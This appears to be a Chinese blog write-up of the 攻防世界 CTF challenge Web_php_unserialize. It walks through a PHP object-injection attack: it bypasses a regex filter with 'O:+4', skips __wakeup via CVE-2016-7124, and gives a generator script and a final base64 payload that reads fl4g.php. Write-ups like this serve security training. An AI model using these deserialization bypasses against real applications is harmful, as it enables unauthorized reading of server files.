攻防世界-Web-Web_php_unserialize

最新推荐文章于 2022-07-19 22:18:30 发布
最新推荐文章于 2022-07-19 22:18:30 发布
阅读量155 收藏
点赞数
分类专栏: WriteUp 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39091609/article/details/107932622
版权

0x01

打开题目看到PHP源码如下:

<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
if (isset($_GET['var'])) { 
    $var = base64_decode($_GET['var']); 
    if (preg_match('/[oc]:\d+:/i', $var)) { 
        die('stop hacking!'); 
    } else {
        @unserialize($var); 
    } 
} else { 
    highlight_file("index.php"); 
} 
?>

后端对用户的输入做了以下处理:

  • 对提交的var值进行base64解码
  • 对解码后的字符串做一个正则匹配,如果其中包含了[oc]:\d+:,即类似o:4:之类的字符串,就会被阻止
  • 通过了上一条过滤就要进入__wakeup()函数,检查file字段内容

0x02

接下来分析绕过思路:

  • base64容易解决,对payload进行一次编码即可
  • 由于正则匹配的是:后面紧跟数字,那么我们可以用添加正好的方式来绕过,即构造O:+4
  • 利用CVE-2016-7124绕过__wakeup()的执行

下面通过在本地写一段PHP来生成payload:

<?php
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
if (isset($_GET['var'])) { 
    $var = base64_decode($_GET['var']); 
    if (preg_match('/[oc]:\d+:/i', $var)) { 
        die('stop hacking!'); 
    } else {
        @unserialize($var); 
    } 
} else { 
    highlight_file("test.php"); 
} 

$a = new Demo("fl4g.php");
$s = serialize($a);

$s = str_replace("O:4", "O:+4", $s);
$s = str_replace(":1:", ":2:", $s);
echo base64_encode($s);
//TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==
?>

0x03

提交
?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==
获得flag

uh3ng
关注
专栏目录
【网络安全 | CTF】攻防世界 Web_php_unserialize 解题详析
等风来
05-28 3801
这段代码接收参数 var,使用 base64_decode 函数对 var 进行解码,然后通过 preg_match 函数判断是否包含类似 o:2的字符串,如果存在则中断程序执行,否则调用 @unserialize 函数进行反序列化操作。这段代码首先定义了一个名为 Demo 的类,包含了一个私有变量 $file 和三个魔术方法 __construct()、__destruct() 和 __wakeup()。3、private在变量名前添加标记\00(classname)\00,长度+2+类名长度,如。
攻防世界】十二 --- unserialize3 --- php反序列化
qq_43168364的博客
12-25 520
题目 — unserialize3 一、writeup 一道php反序列化的题 关键点: 当审出存在反序列化漏洞时,我们将对应的那个类拿出到自己的php环境中,先用恶意字符串实例化该类然后用serialize()函数,进行序列化,将序列化好的东西抛出到环境中即可造成反序列化漏洞 当$flag='111’是可以看到flag,通过?code查询字符串来传入需要反序列化的字符串 反序列时会自动调用__wakeup() 函数,导致程序结束执行,因此要绕过 __wakeup() 函数(绕过的方法在知识点中有介绍)
攻防世界web进阶_Web_php_unserialize
chy082的博客
08-21 707
攻防世界web进阶_Web_php_unserialize 解题思路 打开之后是一段代码审计 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file;//构造函数 把里面的参数变成传进来的参数 } function __destruct() { echo @highlight_file($this->file, true); } func
攻防世界 web Web_php_unserialize
汗的博客
08-24 674
攻防世界 web 高手区 Web_php_unserialize 资源&工具 PHP 手册 W3School的PHP 参考手册 write up 源码 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { e
攻防世界-web-Web_php_unserialize
mlws1900的博客
07-19 420
获取环境 很明显,看题目就是和php序列化有关的get请求接受一个var值,base64编码解码,而且对’/[oc]:\d+:/i’进行过滤,然后反序列化,到__weakup()函数,并且提示flag就在fl4g.php里面,所以构造payload 构造一下payload 上面为测试,显示空白页面,base64后显示stop hacking ’/[oc]:\d+:/i’并未绕过,看了其他wp,发现只需要在类之前加上+即可 后面的数字自然更改 综合payload就是
攻防世界——Web——Web_php_unserialize
慎铭的博客
02-22 737
题目源代码如下。 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function __wakeup
攻防世界Web_php_unserialize
qq_51233573的博客
03-10 2549
最近开始刷攻防世界web题目,遇到一个比较有意思的题目。ctf小白大家勿喷 访问题目链接 是一段php代码 对代码进行初步审计 发现unserialize函数 可以确定是一个php反序列化的利用 由于刚开始学习php的反序列化 对php不是特别熟悉所以对代码进行逐行解析 <?php class Demo { private $file = 'index.php'; //设置了类的私有变量 public function __construc...
攻防世界-Web进阶篇-006Web_php_unserialize
gyy990526的博客
03-14 1997
解:打开靶机是一段php代码,代码审计,发现是一道反序列化问题。在上一篇咱们提到过_wakeup()函数需要通过不正确的属性值来绕过,所以这一点已经解决。 <?php class Demo { private $file = 'index.php'; public function __construct($file) { //创建时执行 $this->file = $file; } function __destruct() { //摧
攻防世界:反序列化 Web_php_unserialize
zxnimud5的专栏
09-14 518
<?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function __wakeup() { .
攻防世界web_php_unserialize
weixin_52268949的博客
02-06 713
web_php_unserialize 进入环境给出源码 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); }
攻防世界web进阶区Web_php_unserialize
gongjingege的博客
07-21 433
打开链接后,源码审计 1,unserialize时,_wakeup()的绕过 //只需要令序列化字符串中标识变量数量的值大于实 际变量 2,绕过preg_match正则,因为正则会过滤掉序列化开头的字母O //使用+可以绕过preg_match() 正则匹配,O:4改成O:+4 这里参考了大佬的反序列化代码 因为题目还要求base64解码再赋值给var传参 所以运行一下后构造payload payload: /index.php?var=TzorNDoiRGVtbyI6Mjp7czoxM
攻防世界-Web_php_unserialize详解
Mr_helloword的博客
08-10 4586
Web_php_unserialize 源码: <?php class Demo { //定义一个类 private $file = 'index.php'; //变量属性 public function __construct($file) { //类方法 $this->file = $file; } function __destruct() { echo @highlight_file(
功防世界 Web_php_unserialize
开心星人的博客
05-13 496
<?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function __wakeup() {
攻防世界WEB进阶之unserialize3
harry_c的博客
08-01 1659
攻防世界WEB进阶之unserialize3第一步:分析第二步:实操第三步:答案 难度系数: 1星 题目来源: 暂无 题目描述:暂无 第一步:分析 题目仅仅给出了一个场景打开场景看到了如下内容: class xctf{ public $flag = ‘111’; public function __wakeup(){ exit(‘bad requests’); } ?code= 通过分析在浏览器地...
攻防世界-Web_php_unserialize
qq_53755216的博客
04-01 129
题目 废话没多说 上来就是一段代码 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function
XCTF-高手进阶区:Web_php_unserialize(详解)
1stPeak's Blog
02-29 3983
代码审计: <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_fi...
【XCTF 攻防世界WEB 高手进阶区 Web_php_unserialize
weixin_45844670的博客
08-22 411
题目是一段php代码 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function __wake
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值